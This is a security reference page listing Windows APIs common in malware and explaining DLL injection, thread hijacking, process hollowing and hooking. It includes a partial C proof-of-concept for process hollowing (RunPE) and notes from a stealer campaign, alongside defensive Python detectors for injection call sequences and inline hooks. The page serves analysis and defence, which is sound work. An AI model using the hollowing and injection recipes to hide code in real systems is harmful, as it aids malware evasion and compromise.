Common API used in Malware


tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE). Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Generic

Networking

| Raw Sockets   | WinAPI Sockets |
| ------------- | -------------- |
| socket()      | WSAStartup()   |
| bind()        | bind()         |
| listen()      | listen()       |
| accept()      | accept()       |
| connect()     | connect()      |
| read()/recv() | recv()         |
| write()       | send()         |
| shutdown()    | WSACleanup()   |

Persistence

| Registry         | File          | Service                      |
| ---------------- | ------------- | ---------------------------- |
| RegCreateKeyEx() | GetTempPath() | OpenSCManager                |
| RegOpenKeyEx()   | CopyFile()    | CreateService()              |
| RegSetValueEx()  | CreateFile()  | StartServiceCtrlDispatcher() |
| RegDeleteKeyEx() | WriteFile()   |                              |
| RegGetValue()    | ReadFile()    |                              |

Encryption

| Name                  |
| --------------------- |
| WinCrypt              |
| CryptAcquireContext() |
| CryptGenKey()         |
| CryptDeriveKey()      |
| CryptDecrypt()        |
| CryptReleaseContext() |

Anti-Analysis/VM

| Function Name                                            | Assembly Instructions |
| -------------------------------------------------------- | --------------------- |
| IsDebuggerPresent()                                      | CPUID()               |
| GetSystemInfo()                                          | IN()                  |
| GlobalMemoryStatusEx()                                   |                       |
| GetVersion()                                             |                       |
| CreateToolhelp32Snapshot [Check if a process is running] |                       |
| CreateFileW/A [Check if a file exists]                   |                       |

Stealth

| Name                     | Use                                                                          |
| ------------------------ | ---------------------------------------------------------------------------- |
| VirtualAlloc             | Alloc memory (packers)                                                       |
| VirtualProtect           | Change memory permission (packer giving execution permission to a section)   |
| ReadProcessMemory        | Injection into external processes                                            |
| WriteProcessMemoryA/W    | Injection into external processes                                            |
| NtWriteVirtualMemory     |                                                                              |
| CreateRemoteThread       | DLL/Process injection...                                                     |
| NtUnmapViewOfSection     |                                                                              |
| QueueUserAPC             |                                                                              |
| CreateProcessInternalA/W |                                                                              |

Execution

| Function Name   |
| --------------- |
| CreateProcessA/W |
| ShellExecute    |
| WinExec         |
| ResumeThread    |
| NtResumeThread  |

Miscellaneous

  • GetAsyncKeyState() -- Key logging
  • SetWindowsHookEx -- Key logging
  • GetForegroundWindow -- Get running window name (or the website from a browser)
  • LoadLibrary() -- Import library
  • GetProcAddress() -- Import library
  • CreateToolhelp32Snapshot() -- List running processes
  • GetDC() -- Screenshot
  • BitBlt() -- Screenshot
  • InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- Access the Internet
  • FindResource(), LoadResource(), LockResource() -- Access resources of the executable

Malware Techniques

DLL Injection

Inject a malicious DLL into another process

  1. Find the process to inject the malicious DLL into: CreateToolhelp32Snapshot, Process32First, Process32Next
  2. Open the process: GetModuleHandle, GetProcAddress, OpenProcess
  3. Write the DLL path inside the process: VirtualAllocEx, WriteProcessMemory
  4. Create a thread in the process that will load the malicious DLL: CreateRemoteThread, LoadLibrary

Other functions to use: NtCreateThreadEx, RtlCreateUserThread

Reflective DLL Injection

Load the malicious DLL without calling the normal Windows API calls.
The DLL is mapped inside a process; it will resolve the import addresses, fix the relocations and call the DllMain function.

Thread Hijacking

Find a thread of a process and make it load a malicious DLL

  1. Find a target thread: CreateToolhelp32Snapshot, Thread32First, Thread32Next
  2. Open the thread: OpenThread
  3. Suspend the thread: SuspendThread
  4. Write the path to the malicious DLL inside the victim process: VirtualAllocEx, WriteProcessMemory
  5. Resume the thread, which loads the library: ResumeThread

PE Injection

Portable Executable Injection: the executable is written into the memory of the victim process and executed from there.

Process Hollowing (a.k.a RunPE)

Process Hollowing is one of the favourite defence-evasion / execution tricks used by Windows malware. The idea is to launch a legitimate process in the suspended state, remove (hollow) its original image from memory and copy an arbitrary PE in its place. When the primary thread is finally resumed, the malicious entry point executes under the guise of a trusted binary (often signed by Microsoft).

Typical workflow:

  1. Spawn a benign host (e.g. RegAsm.exe, rundll32.exe, msbuild.exe) suspended so that no instructions run yet.

```c
STARTUPINFOA  si = { sizeof(si) };
PROCESS_INFORMATION pi;
CreateProcessA("C:\\Windows\\Microsoft.NET\\Framework32\\v4.0.30319\\RegAsm.exe",
               NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
```

  2. Read the malicious payload into memory and parse its PE headers to obtain SizeOfImage, the sections and the new EntryPoint.
  3. NtUnmapViewOfSection / ZwUnmapViewOfSection – unmap the original image base of the suspended process.
  4. VirtualAllocEx – reserve RWX memory of SizeOfImage inside the remote process.
  5. WriteProcessMemory – copy the headers first, then iterate over the sections copying their raw data.
  6. SetThreadContext – patch the value of EAX/RAX (RCX on x64) or Rip in the context structure so EIP points to the payload's EntryPoint.
  7. ResumeThread – the thread continues, executing the attacker-supplied code.

Minimal proof-of-concept (x86):

```c
void RunPE(LPCSTR host, LPVOID payload, DWORD payloadSize){
    // pHdr: IMAGE_NT_HEADERS of the payload, parsed in step 2 of the workflow (not shown here)
    // NtUnmapViewOfSection is not declared in windows.h; it has to be resolved from ntdll.dll
    // 1. create suspended process
    STARTUPINFOA si = {sizeof(si)}; PROCESS_INFORMATION pi;
    CreateProcessA(host, NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi);

    // 2. read remote PEB to get ImageBaseAddress (EBX holds the PEB pointer of a freshly created x86 process)
    CONTEXT ctx; ctx.ContextFlags = CONTEXT_FULL;
    GetThreadContext(pi.hThread,&ctx);
    PVOID baseAddr;
    ReadProcessMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&baseAddr,4,NULL);

    // 3. unmap original image & allocate new region at same base
    NtUnmapViewOfSection(pi.hProcess,baseAddr);
    PVOID newBase = VirtualAllocEx(pi.hProcess,baseAddr,pHdr->OptionalHeader.SizeOfImage,
                                   MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    // 4-5. copy headers & sections …
    // 6. write new image base into PEB and set Eip
    //    (newBase equals baseAddr when the allocation at the requested address succeeded)
    WriteProcessMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&baseAddr,4,NULL);
    ctx.Eax = (DWORD)(newBase) + pHdr->OptionalHeader.AddressOfEntryPoint;
    SetThreadContext(pi.hThread,&ctx);
    // 7. run!
    ResumeThread(pi.hThread);
}
```

Practical notes observed in the DarkCloud Stealer campaign:

  • The loader picked RegAsm.exe (part of the .NET Framework) as host – a signed binary unlikely to attract attention.
  • The decrypted VB6 stealer (holographies.exe) is never dropped to disk; it exists only inside the hollowed process, making static detection harder.
  • Sensitive strings (regexes, paths, Telegram credentials) are RC4-encrypted per string and decrypted only at runtime, further hampering memory scanning.

Detection ideas:

  • Alert on CREATE_SUSPENDED processes that never create GUI/console windows before a memory region is allocated as RWX (rare for benign code).
  • Look for the call sequence NtUnmapViewOfSection ➜ VirtualAllocEx ➜ WriteProcessMemory between different processes.
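The following Python script is an added example (not code from the page or from HackTricks) that turns the call-sequence idea above, together with the DLL Injection chain from earlier on this page, into a detector that can be run over API-call telemetry. The line format `seq pid=<caller> api=<Name> target=<pid>` and the sample trace are assumptions modelled on sandbox/EDR traces, not real captured data; the pattern names and steps are the API names this page lists.

```python
"""Injection-sequence detector over API-call telemetry (added example).

Constructed example: consumes one API call per line in an assumed format
modelled on sandbox / EDR telemetry,
    <seq> pid=<caller> api=<Name> target=<pid acted on> [key=value ...]
and reports which cross-process injection pattern a (caller, target) pair has
completed, plus any cross-process RWX allocation.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<seq>\d+)\s+pid=(?P<pid>\d+)\s+api=(?P<api>\w+)\s+target=(?P<target>\d+)(?P<rest>.*)$"
)

# Each pattern is an ordered list of steps; a step is satisfied by any API in its set.
# Steps must occur in order from the same caller against the same target, but other
# calls may be interleaved, because real telemetry is noisy.
PATTERNS = {
    "process_hollowing": [
        {"CreateProcessA", "CreateProcessW", "CreateProcessInternalA", "CreateProcessInternalW"},
        {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
        {"VirtualAllocEx"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"SetThreadContext"},
        {"ResumeThread", "NtResumeThread"},
    ],
    "dll_injection": [
        {"OpenProcess"},
        {"VirtualAllocEx"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread"},
    ],
}

# Constructed sample trace: a hollowing chain, a classic DLL-injection chain and a
# benign reader (e.g. a debugger or inventory tool) that only reads memory.
SAMPLE_TRACE = """\
1 pid=4100 api=CreateProcessA target=4200 flags=CREATE_SUSPENDED
2 pid=4100 api=NtUnmapViewOfSection target=4200
3 pid=4100 api=VirtualAllocEx target=4200 prot=PAGE_EXECUTE_READWRITE
4 pid=4100 api=WriteProcessMemory target=4200
5 pid=4100 api=SetThreadContext target=4200
6 pid=4100 api=ResumeThread target=4200
7 pid=5000 api=OpenProcess target=5100
8 pid=5000 api=VirtualAllocEx target=5100 prot=PAGE_READWRITE
9 pid=5000 api=WriteProcessMemory target=5100
10 pid=5000 api=CreateRemoteThread target=5100
11 pid=6000 api=OpenProcess target=6100
12 pid=6000 api=ReadProcessMemory target=6100
"""


def parse_trace(text):
    """Parse trace lines into (seq, caller, api, target, extra) tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((int(m["seq"]), int(m["pid"]), m["api"], int(m["target"]), m["rest"].strip()))
    return events


def detect_sequences(events):
    """Return [(pattern, caller, target, seq_of_last_step)] for every completed pattern."""
    progress = defaultdict(lambda: {name: 0 for name in PATTERNS})  # next expected step per pair
    hits = []
    for seq, caller, api, target, _ in events:
        if caller == target:
            continue  # a process touching its own memory is not cross-process injection
        state = progress[(caller, target)]
        for name, steps in PATTERNS.items():
            i = state[name]
            if i < len(steps) and api in steps[i]:
                state[name] = i + 1
                if i + 1 == len(steps):
                    hits.append((name, caller, target, seq))
    return hits


def rwx_allocations(events):
    """Cross-process VirtualAllocEx calls asking for RWX pages: rare in benign code."""
    return [(caller, target, seq) for seq, caller, api, target, extra in events
            if api == "VirtualAllocEx" and caller != target
            and "prot=PAGE_EXECUTE_READWRITE" in extra]


if __name__ == "__main__":
    evs = parse_trace(SAMPLE_TRACE)
    for hit in detect_sequences(evs):
        print("injection pattern %s: pid %d -> pid %d (completed at event %d)" % hit)
    for alloc in rwx_allocations(evs):
        print("RWX allocation: pid %d -> pid %d (event %d)" % alloc)
```

On the sample trace the script reports the hollowing pair 4100 ➜ 4200 and the DLL-injection pair 5000 ➜ 5100, and stays silent for 6000 ➜ 6100, which only opens and reads the target. Matching per (caller, target) pair rather than per call is what keeps a legitimate debugger, which also opens and reads processes, from tripping the rule.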

Hooking

  • The SSDT (System Service Descriptor Table) points to kernel functions (ntoskrnl.exe) or to the GUI driver (win32k.sys) so that user processes can call these functions.
  • A rootkit may modify these pointers to addresses it controls.
  • IRPs (I/O Request Packets) transmit pieces of data from one component to another. Almost everything in the kernel uses IRPs, and each device object has its own function table that can be hooked: DKOM (Direct Kernel Object Manipulation).
  • The IAT (Import Address Table) is used to resolve dependencies. It is possible to hook this table in order to hijack the code that will be called.
  • EAT (Export Address Table) hooks. These hooks can be done from userland. The goal is to hook the functions exported by DLLs.
  • Inline hooks: this type is harder to achieve. It involves modifying the code of the function itself, typically by placing a jump at its start.
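The following Python code is an added example (not code from the page) of the check a defensive tool makes for the inline hook described in the last bullet: it inspects the first bytes of an exported function, as read from a live process, for a planted control transfer and reports where it branches. The export table, addresses and bytes are constructed for the example, not taken from any real DLL.

```python
"""Inline-hook heuristic for function entry bytes (added example).

Constructed example: given the first bytes of an exported function, report
whether they open with a control transfer of the kind an inline hook plants at
the start of a function. Stub shapes checked:
    E9 rel32                jmp rel32                    (x86 and x64)
    FF 25 disp32            jmp [rip+disp32] (x64) / jmp [abs32] (x86)
    48 B8 imm64 FF E0       mov rax, imm64 ; jmp rax     (x64)
    68 imm32 C3             push imm32 ; ret             (x86)
A function that legitimately starts with a jmp is a false positive, so real
tools confirm a finding by comparing the bytes against the on-disk image.
"""
import struct

MASK64 = (1 << 64) - 1
MASK32 = (1 << 32) - 1


def inline_hook_target(code, address, x64=True):
    """Return (stub_kind, target) if `code` (bytes located at `address`) opens with a hook stub, else None.

    For the indirect jmp the target returned is the pointer slot the stub reads.
    """
    mask = MASK64 if x64 else MASK32
    if len(code) >= 5 and code[0] == 0xE9:
        rel = struct.unpack_from("<i", code, 1)[0]
        return ("jmp_rel32", (address + 5 + rel) & mask)
    if len(code) >= 6 and code[:2] == b"\xff\x25":
        if x64:
            disp = struct.unpack_from("<i", code, 2)[0]
            return ("jmp_indirect", (address + 6 + disp) & mask)
        return ("jmp_indirect", struct.unpack_from("<I", code, 2)[0])
    if x64 and len(code) >= 12 and code[:2] == b"\x48\xb8" and code[10:12] == b"\xff\xe0":
        return ("mov_rax_jmp_rax", struct.unpack_from("<Q", code, 2)[0])
    if not x64 and len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:
        return ("push_ret", struct.unpack_from("<I", code, 1)[0])
    return None


def scan_exports(exports, x64=True):
    """exports: {name: (address, first_bytes)} -> {name: (stub_kind, target)} for suspicious entries."""
    findings = {}
    for name, (address, code) in exports.items():
        hit = inline_hook_target(code, address, x64)
        if hit:
            findings[name] = hit
    return findings


# Constructed sample (addresses and bytes are made up, not from a real ntdll/kernel32):
# - NtReadVirtualMemory keeps a normal x64 syscall-stub prologue (mov r10, rcx ; mov eax, imm32)
# - NtWriteVirtualMemory has been patched with a 5-byte jmp to 0x7FF800002000
# - CreateRemoteThread has been patched with mov rax, imm64 ; jmp rax
SAMPLE_EXPORTS = {
    "NtReadVirtualMemory": (0x7FF800001000, b"\x4c\x8b\xd1\xb8\x3f\x00\x00\x00\x0f\x05\xc3"),
    "NtWriteVirtualMemory": (0x7FF800001020,
                             b"\xe9" + struct.pack("<i", 0x7FF800002000 - (0x7FF800001020 + 5)) + b"\x90\x90"),
    "CreateRemoteThread": (0x7FF800003000,
                           b"\x48\xb8" + struct.pack("<Q", 0x7FF900000000) + b"\xff\xe0"),
}

if __name__ == "__main__":
    for name, (kind, target) in scan_exports(SAMPLE_EXPORTS).items():
        print("%s: entry patched with %s -> 0x%X" % (name, kind, target))
```

Resolving the branch target matters for triage: a target inside a module the process legitimately loaded (an EDR or compatibility shim DLL) is usually benign, whereas a target in an unbacked private RWX region is the situation the injection techniques on this page produce.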
